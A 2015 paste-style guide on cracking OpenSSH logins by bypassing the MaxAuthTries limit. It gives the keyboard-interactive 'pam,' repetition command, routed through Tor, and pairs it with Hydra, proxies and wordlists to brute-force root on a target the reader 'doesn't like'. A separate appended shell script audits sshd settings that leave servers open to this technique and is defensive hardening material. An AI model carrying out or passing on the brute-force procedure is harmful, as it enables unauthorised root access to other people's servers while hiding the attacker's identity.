PH1K3

Paper on how to crack OpenSSH by PH1K3

Aug 15th, 2015
Cracking OpenSSH by PH1K3

big up: z0x, h1tman, sn, psy n all the other guys on the net

OpenSSH is one of the biggest ssh systems on the net

this vuln was found by kingcope and works on all versions of OpenSSH on all Linux, Unix and *BSD systems.
tested on:
FreeBSD, CentOS, Debian (7 n 8), NetBSD (in virtual box), Ubuntu and Kali

original link to it: https://kingcope.wordpress.com/2015/07/16/openssh-keyboard-interactive-authentication-brute-force-vulnerability-maxauthtries-bypass/

this lets u bruteforce an OpenSSH ssh login, so instead of getting 3 tries u get unlimited tries.

what u need:
1: tor socks
2: one vpn or http proxy
3: a multithreaded ssh cracker with proxy support (like hydra)
4: a target (take someone u don't like or just open a virtual box)

first, if u don't got the program 'usewithtor', install it.

get a wordlist from packetstorm (https://packetstormsecurity.com/Crackers/wordlists)

open 2 terminals and an ssh cracker (use a multithreaded one). im going to use hydra cuz it's fast and got proxy support. config hydra with 25 threads, port 22, target ip, http-proxy and a wordlist.
in the second terminal we are going to use tor to connect to the target's ssh and hold the connection like this:
root@thePH1K3m4chin3:~# usewithtor ssh -lroot -oKbdInteractiveDevices=`perl -e 'print "pam," x 10000'` targetip

root@TARGETIP's password:

extras: enum some users to have a bigger attack surface

start the ssh cracker and let it do the work and u should get root

/PH1K3, keep it real n im coming with fresh shit soon, stay tuned
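
Seen from the server side, the steps above depend on keyboard-interactive authentication being enabled, root being allowed to log in with a password, and an unauthenticated connection staying open long enough to keep guessing. The following is an added example, not part of the paste or of OpenSSH, that checks `sshd -T` output for those three settings; the function name, the sample configs and the 60 second threshold are assumptions made here.

```shell
#!/bin/sh
# Added example, not from the paste. Usage on a real host (as root):
#   sshd -T | audit_sshd_kbdint
# Reads effective sshd settings on stdin and prints one line per setting
# that leaves room for the guessing technique described above.
audit_sshd_kbdint() {
    awk '
    NF >= 2 { cfg[tolower($1)] = tolower($2) }
    END {
        # Older releases print challengeresponseauthentication, newer ones
        # kbdinteractiveauthentication; either "yes" counts as enabled.
        if (cfg["kbdinteractiveauthentication"] == "yes" ||
            cfg["challengeresponseauthentication"] == "yes")
            print "kbdint: keyboard-interactive enabled; set KbdInteractiveAuthentication (ChallengeResponseAuthentication on older releases) to no if unused"
        if (cfg["permitrootlogin"] == "yes")
            print "rootpw: PermitRootLogin yes lets root log in with a password"
        # sshd -T reports LoginGraceTime in seconds; 0 means no limit.
        # The 60 second threshold is an assumption of this example.
        if ("logingracetime" in cfg) {
            grace = cfg["logingracetime"] + 0
            if (grace == 0 || grace > 60)
                print "grace: LoginGraceTime " grace "s keeps one unauthenticated connection open that long"
        }
    }'
}

# Constructed sample inputs in `sshd -T` format (lowercase key, then value).
SAMPLE_WEAK='usepam yes
kbdinteractiveauthentication yes
permitrootlogin yes
maxauthtries 3
logingracetime 120'
SAMPLE_HARDENED='usepam yes
kbdinteractiveauthentication no
challengeresponseauthentication no
permitrootlogin prohibit-password
maxauthtries 3
logingracetime 30'

# Prints three findings for the weak sample, nothing for the hardened one.
printf '%s\n' "$SAMPLE_WEAK" | audit_sshd_kbdint
printf '%s\n' "$SAMPLE_HARDENED" | audit_sshd_kbdint
```
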